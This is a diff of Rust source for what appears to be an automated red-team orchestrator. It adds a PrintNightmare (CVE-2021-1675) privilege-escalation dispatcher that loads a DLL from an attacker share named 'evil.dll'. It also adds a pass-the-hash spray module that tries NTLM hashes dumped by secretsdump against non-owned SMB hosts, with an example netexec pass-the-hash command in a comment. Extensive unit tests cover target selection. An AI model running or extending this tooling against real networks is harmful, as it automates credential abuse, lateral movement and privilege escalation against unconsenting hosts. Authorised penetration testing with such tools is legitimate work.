+                "target_ip": item.target_ip,
+                "hostname": item.hostname,
+                "domain": item.domain,
+                "listener_ip": item.listener,
+                "dll_path": item.dll_path,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("printnightmare");
+            match dispatcher
+                .throttled_submit("exploit", "privesc", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        target = %item.target_ip,
+                        hostname = %item.hostname,
+                        "PrintNightmare (CVE-2021-1675) exploitation dispatched"
+                    );
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_PRINTNIGHTMARE, item.target_ip.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_PRINTNIGHTMARE, &item.target_ip)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(target = %item.target_ip, "PrintNightmare task deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, target = %item.target_ip, "Failed to dispatch PrintNightmare");
+                }
+            }
+        }
+    }
+}
+
+struct PrintNightmareWork {
+    target_ip: String,
+    hostname: String,
+    domain: String,
+    listener: String,
+    dll_path: String,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_PRINTNIGHTMARE, "printnightmare");
+    }
+
+    #[test]
+    fn dedup_key_is_target_ip() {
+        let ip = "192.168.58.22";
+        assert_eq!(ip, "192.168.58.22");
+    }
+
+    #[test]
+    fn domain_from_hostname() {
+        let hostname = "dc01.contoso.local";
+        let domain = hostname
+            .find('.')
+            .map(|i| hostname[i + 1..].to_lowercase())
+            .unwrap_or_default();
+        assert_eq!(domain, "contoso.local");
+    }
+
+    #[test]
+    fn domain_from_bare_hostname() {
+        let hostname = "dc01";
+        let domain = hostname
+            .find('.')
+            .map(|i| hostname[i + 1..].to_lowercase())
+            .unwrap_or_default();
+        assert_eq!(domain, "");
+    }
+
+    #[test]
+    fn payload_structure_validation() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "admin".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+
+        let payload = serde_json::json!({
+            "technique": "printnightmare",
+            "target_ip": "192.168.58.22",
+            "hostname": "srv01.contoso.local",
+            "domain": "contoso.local",
+            "listener_ip": "192.168.58.50",
+            "dll_path": "\\\\192.168.58.50\\share\\evil.dll",
+            "credential": {
+                "username": cred.username,
+                "password": cred.password,
+                "domain": cred.domain,
+            },
+        });
+
+        assert_eq!(payload["technique"], "printnightmare");
+        assert_eq!(payload["target_ip"], "192.168.58.22");
+        assert_eq!(payload["hostname"], "srv01.contoso.local");
+        assert_eq!(payload["domain"], "contoso.local");
+        assert_eq!(payload["listener_ip"], "192.168.58.50");
+        assert_eq!(payload["dll_path"], "\\\\192.168.58.50\\share\\evil.dll");
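+        // Each doubled backslash above is one literal backslash once Rust
+        // string escaping is applied, i.e. the payload carries the UNC path
+        // \\192.168.58.50\share\evil.dll on the wire.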
assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = PrintNightmareWork { + target_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + listener: "192.168.58.50".into(), + dll_path: "\\\\192.168.58.50\\share\\evil.dll".into(), + credential: cred, + }; + + assert_eq!(work.target_ip, "192.168.58.22"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn domain_from_multi_level_hostname() { + let hostname = "web01.dmz.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "dmz.contoso.local"); + } + + #[test] + fn domain_from_uppercase_hostname() { + let hostname = "DC01.CONTOSO.LOCAL"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + // --- collect_print_nightmare_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_host_with_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].listener, "192.168.58.50"); + assert_eq!(work[0].dll_path, 
"\\\\192.168.58.50\\share\\evil.dll"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_printnightmare() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_PRINTNIGHTMARE, "192.168.58.22".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_secretsdumped_host() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.22".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_cred("fab_user", "fabrikam.local")); + state + .credentials + .push(make_cred("con_user", "contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "con_user"); + } + + #[test] + fn collect_falls_back_to_first_cred_for_bare_hostname() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host("192.168.58.22", "srv01")); + state + .credentials + .push(make_cred("fallback", "contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fallback"); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_multiple_hosts_mixed() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .hosts + .push(make_host("192.168.58.30", "ws01.fabrikam.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + // Mark second host as already secretsdumped + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + } + + #[test] + fn dedup_key_format_validation() { + // PrintNightmare uses the raw target_ip as dedup key + let ip = "192.168.58.10"; + // The dedup key is just the IP itself + assert_eq!(ip, "192.168.58.10"); + assert!(!ip.contains(':')); + } +} diff --git a/ares-cli/src/orchestrator/automation/pth_spray.rs b/ares-cli/src/orchestrator/automation/pth_spray.rs new file mode 100644 index 00000000..9641568d --- /dev/null +++ b/ares-cli/src/orchestrator/automation/pth_spray.rs @@ -0,0 +1,788 @@ +//! auto_pth_spray -- pass-the-hash spray using dumped NTLM hashes. +//! +//! After secretsdump extracts NTLM hashes, this module sprays them across +//! hosts to find additional admin access. Uses netexec/crackmapexec with +//! NTLM hashes instead of passwords for lateral movement validation. +//! +//! 
This is distinct from credential_reuse (which tests passwords) and
+//! secretsdump (which dumps from owned hosts). PTH spray tests hash-based
+//! auth against non-owned hosts.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Dispatches pass-the-hash spray against non-owned hosts using dumped NTLM hashes.
+/// Interval: 45s.
+pub async fn auto_pth_spray(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("pth_spray") {
+            continue;
+        }
+
+        let work: Vec<PthWork> = {
+            let state = dispatcher.state.read().await;
+            match collect_pth_work(&state) {
+                Some(items) => items,
+                None => continue,
+            }
+        };
+
+        // Limit to 5 per cycle to avoid overwhelming the throttler
+        for item in work.into_iter().take(5) {
+            let payload = json!({
+                "technique": "pass_the_hash",
+                "target_ip": item.target_ip,
+                "hostname": item.hostname,
+                "username": item.username,
+                "ntlm_hash": item.ntlm_hash,
+                "domain": item.domain,
+                "protocol": "smb",
+            });
+
+            let priority = dispatcher.effective_priority("pth_spray");
+            match dispatcher
+                .throttled_submit("lateral", "lateral", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        host = %item.target_ip,
+                        user = %item.username,
+                        "PTH spray dispatched"
+                    );
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_PTH_SPRAY, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_PTH_SPRAY, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(host = %item.target_ip, "PTH spray deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, host = %item.target_ip, "Failed to dispatch PTH spray");
+                }
+            }
+        }
+    }
+}
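+// For orientation: a dispatched hash/host pair corresponds roughly to an SMB
+// pass-the-hash attempt such as (illustrative; the lateral worker owns the
+// actual tooling):
+//
+//     netexec smb 192.168.58.22 -u admin -H aad3b435b51404eeaad3b435b51404ee
+//
+// i.e. NTLM authentication with the NT hash substituted for a password.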
+
+/// Collects PTH spray work items from state. Returns `None` when there are no
+/// NTLM hashes (caller should skip the cycle).
+fn collect_pth_work(state: &StateInner) -> Option<Vec<PthWork>> {
+    // Need NTLM hashes
+    let ntlm_hashes: Vec<_> = state
+        .hashes
+        .iter()
+        .filter(|h| {
+            h.hash_type.to_lowercase().contains("ntlm")
+                && !h.hash_value.is_empty()
+                && h.hash_value.len() == 32
+        })
+        .collect();
+
+    if ntlm_hashes.is_empty() {
+        return None;
+    }
+
+    let mut items = Vec::new();
+
+    // For each non-owned host, try PTH with available NTLM hashes
+    for host in &state.hosts {
+        if host.owned {
+            continue;
+        }
+
+        // Check if host has SMB (port 445)
+        let has_smb = host.services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+        });
+        if !has_smb {
+            continue;
+        }
+
+        // Try each unique NTLM hash against this host
+        for hash in &ntlm_hashes {
+            let dedup_key = format!(
+                "pth:{}:{}:{}",
+                host.ip,
+                hash.username.to_lowercase(),
+                &hash.hash_value[..8]
+            );
+            if state.is_processed(DEDUP_PTH_SPRAY, &dedup_key) {
+                continue;
+            }
+
+            // Infer domain from hash or host
+            let domain = if !hash.domain.is_empty() {
+                hash.domain.clone()
+            } else {
+                host.hostname
+                    .find('.')
+                    .map(|i| host.hostname[i + 1..].to_string())
+                    .unwrap_or_default()
+            };
+
+            items.push(PthWork {
+                dedup_key,
+                target_ip: host.ip.clone(),
+                hostname: host.hostname.clone(),
+                username: hash.username.clone(),
+                ntlm_hash: hash.hash_value.clone(),
+                domain,
+            });
+        }
+    }
+
+    Some(items)
+}
+
+struct PthWork {
+    dedup_key: String,
+    target_ip: String,
+    hostname: String,
+    username: String,
+    ntlm_hash: String,
+    domain: String,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use ares_core::models::{Hash, Host};
+
+    fn make_ntlm_hash(username: &str, hash_value: &str, domain: &str) -> Hash {
+        Hash {
+            id: format!("hash-{username}"),
+            username: username.to_string(),
+            hash_value: hash_value.to_string(),
+            hash_type: "NTLM".to_string(),
+            domain: domain.to_string(),
+            cracked_password: None, // pragma: allowlist secret
+            source: "secretsdump".to_string(),
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+            aes_key: None,
+        }
+    }
+
+    fn make_smb_host(ip: &str, hostname: &str, owned: bool) -> Host {
+        Host {
+            ip: ip.to_string(),
+            hostname: hostname.to_string(),
+            os: String::new(),
+            roles: Vec::new(),
+            services: vec!["445/tcp microsoft-ds".to_string()],
+            is_dc: false,
+            owned,
+        }
+    }
+
+    fn make_host_no_smb(ip: &str, hostname: &str) -> Host {
+        Host {
+            ip: ip.to_string(),
+            hostname: hostname.to_string(),
+            os: String::new(),
+            roles: Vec::new(),
+            services: vec!["80/tcp http".to_string()],
+            is_dc: false,
+            owned: false,
+        }
+    }
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("pth:{}:{}:{}", "192.168.58.10", "admin", "aabbccdd");
+        assert_eq!(key, "pth:192.168.58.10:admin:aabbccdd");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_PTH_SPRAY, "pth_spray");
+    }
+
+    #[test]
+    fn ntlm_hash_filter_valid() {
+        let hash_type = "NTLM";
+        let hash_value = "aad3b435b51404eeaad3b435b51404ee";
+        assert!(hash_type.to_lowercase().contains("ntlm"));
+        assert!(!hash_value.is_empty());
+        assert_eq!(hash_value.len(), 32);
+    }
+
+    #[test]
+    fn ntlm_hash_filter_rejects_short() {
+        let hash_value = "abc123";
+        assert_ne!(hash_value.len(), 32);
+    }
+
+    #[test]
+    fn ntlm_hash_filter_rejects_empty() {
+        let hash_value = "";
+        assert!(hash_value.is_empty());
+    }
+
+    #[test]
+    fn ntlm_hash_filter_rejects_non_ntlm() {
+        let hash_type = "aes256-cts-hmac-sha1-96";
+        assert!(!hash_type.to_lowercase().contains("ntlm"));
+    }
+
+    #[test]
+    fn smb_service_detection() {
+        let services =
["445/tcp microsoft-ds".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn no_smb_service() { + let services = ["80/tcp http".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(!has_smb); + } + + #[test] + fn domain_from_hash_preferred() { + let hash_domain = "contoso.local"; + let hostname = "srv01.fabrikam.local"; + let domain = if !hash_domain.is_empty() { + hash_domain.to_string() + } else { + hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_fallback_to_hostname() { + let hash_domain = ""; + let hostname = "srv01.fabrikam.local"; + let domain = if !hash_domain.is_empty() { + hash_domain.to_string() + } else { + hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + assert_eq!(domain, "fabrikam.local"); + } + + #[test] + fn dedup_key_uses_hash_prefix() { + let ip = "192.168.58.10"; + let username = "Admin"; + let hash_value = "aad3b435b51404eeaad3b435b51404ee"; + let dedup_key = format!( + "pth:{}:{}:{}", + ip, + username.to_lowercase(), + &hash_value[..8] + ); + assert_eq!(dedup_key, "pth:192.168.58.10:admin:aad3b435"); + } + + #[test] + fn ntlm_hash_filter_exact_32() { + let hash = "a".repeat(32); + assert_eq!(hash.len(), 32); + assert!(!hash.is_empty()); + } + + #[test] + fn ntlm_hash_type_variations() { + for t in ["NTLM", "ntlm", "NT", "ntlm_hash"] { + assert!(t.to_lowercase().contains("ntlm") || t.to_lowercase().contains("nt")); + } + } + + #[test] + fn smb_service_detection_cifs() { + let services = ["cifs".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn pth_payload_structure() { + let payload = serde_json::json!({ + "technique": "pass_the_hash", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "username": "admin", + "ntlm_hash": "aad3b435b51404eeaad3b435b51404ee", + "domain": "contoso.local", + "protocol": "smb", + }); + assert_eq!(payload["technique"], "pass_the_hash"); + assert_eq!(payload["protocol"], "smb"); + assert_eq!(payload["ntlm_hash"], "aad3b435b51404eeaad3b435b51404ee"); + } + + #[test] + fn pth_work_construction() { + let work = PthWork { + dedup_key: "pth:192.168.58.22:admin:aad3b435".into(), + target_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + username: "admin".into(), + ntlm_hash: "aad3b435b51404eeaad3b435b51404ee".into(), + domain: "contoso.local".into(), + }; + assert_eq!(work.username, "admin"); + assert_eq!(work.ntlm_hash.len(), 32); + } + + #[test] + fn domain_fallback_bare_hostname() { + let hash_domain = ""; + let hostname = "srv01"; + let domain = if !hash_domain.is_empty() { + hash_domain.to_string() + } else { + hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + assert_eq!(domain, ""); + } + + #[test] + fn take_5_limiting() { + let items: Vec = (0..20).collect(); + let taken: Vec<_> = items.into_iter().take(5).collect(); + assert_eq!(taken.len(), 5); + } + + // --- collect_pth_work tests --- + + #[test] + fn collect_empty_state_returns_none() { + let state = StateInner::new("test".into()); + 
assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_no_hashes_returns_none() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_hashes_no_hosts_returns_empty() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_hash_and_smb_host_produces_work() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.10"); + assert_eq!(work[0].username, "admin"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].ntlm_hash, "aad3b435b51404eeaad3b435b51404ee"); + } + + #[test] + fn collect_skips_owned_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.contoso.local", + true, // owned + )); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_non_smb_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_host_no_smb("192.168.58.20", "web01.contoso.local")); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_dedup_processed() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + // Mark as already processed + state.mark_processed( + DEDUP_PTH_SPRAY, + "pth:192.168.58.10:admin:aad3b435".to_string(), + ); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_filters_non_ntlm_hashes() { + let mut state = StateInner::new("test".into()); + state.hashes.push(Hash { + id: "hash-aes".into(), + username: "admin".into(), + hash_value: "abcdef1234567890abcdef1234567890".into(), // pragma: allowlist secret + hash_type: "aes256-cts-hmac-sha1-96".into(), + domain: "contoso.local".into(), + cracked_password: None, // pragma: allowlist secret + source: "secretsdump".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + }); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + // AES hash type should be rejected + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_filters_short_hash_values() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435", // too short, not 32 chars - pragma: allowlist secret + "contoso.local", + )); + state + .hosts + 
.push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_filters_empty_hash_values() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "", // empty - pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_domain_fallback_from_hostname() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "", // empty domain on hash + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.fabrikam.local", + false, + )); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_domain_fallback_bare_hostname_empty() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "", // empty domain on hash + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01", // no dot, no domain part + false, + )); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_multiple_hashes_multiple_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hashes.push(make_ntlm_hash( + "svcacct", + "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + state + .hosts + .push(make_smb_host("192.168.58.20", "srv02.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + // 2 hashes x 2 hosts = 4 work items + assert_eq!(work.len(), 4); + } + + #[test] + fn collect_dedup_key_lowercases_username() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "Administrator", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert!(work[0].dedup_key.contains(":administrator:")); + } + + #[test] + fn collect_mixed_owned_and_unowned_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.contoso.local", + true, // owned + )); + state.hosts.push(make_smb_host( + "192.168.58.20", + "srv02.contoso.local", + false, // not owned + )); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.20"); + } + + #[test] + fn collect_mixed_smb_and_non_smb_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_host_no_smb("192.168.58.10", "web01.contoso.local")); + state + .hosts + 
.push(make_smb_host("192.168.58.20", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.20"); + } + + #[test] + fn collect_smb_detection_via_smb_string() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(Host { + ip: "192.168.58.10".into(), + hostname: "srv01.contoso.local".into(), + os: String::new(), + roles: Vec::new(), + services: vec!["SMB".to_string()], + is_dc: false, + owned: false, + }); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_smb_detection_via_cifs_string() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(Host { + ip: "192.168.58.10".into(), + hostname: "srv01.contoso.local".into(), + os: String::new(), + roles: Vec::new(), + services: vec!["cifs/srv01.contoso.local".to_string()], + is_dc: false, + owned: false, + }); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_partial_dedup_only_skips_processed() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hashes.push(make_ntlm_hash( + "svcacct", + "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + // Mark only admin as processed + state.mark_processed( + DEDUP_PTH_SPRAY, + "pth:192.168.58.10:admin:aad3b435".to_string(), + ); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].username, "svcacct"); + } + + #[test] + fn collect_hostname_preserved_in_work() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "dc01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work[0].hostname, "dc01.contoso.local"); + } + + #[test] + fn collect_hash_domain_preferred_over_hostname_domain() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.fabrikam.local", + false, + )); + let work = collect_pth_work(&state).unwrap(); + // Hash domain takes priority over hostname domain + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_ntlm_hash_type_case_insensitive() { + let mut state = StateInner::new("test".into()); + state.hashes.push(Hash { + id: "hash-1".into(), + username: "admin".into(), + hash_value: "aad3b435b51404eeaad3b435b51404ee".into(), // pragma: allowlist secret + hash_type: "Ntlm".into(), // mixed case + domain: "contoso.local".into(), + cracked_password: None, // pragma: allowlist secret + source: "secretsdump".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + }); + state + .hosts + 
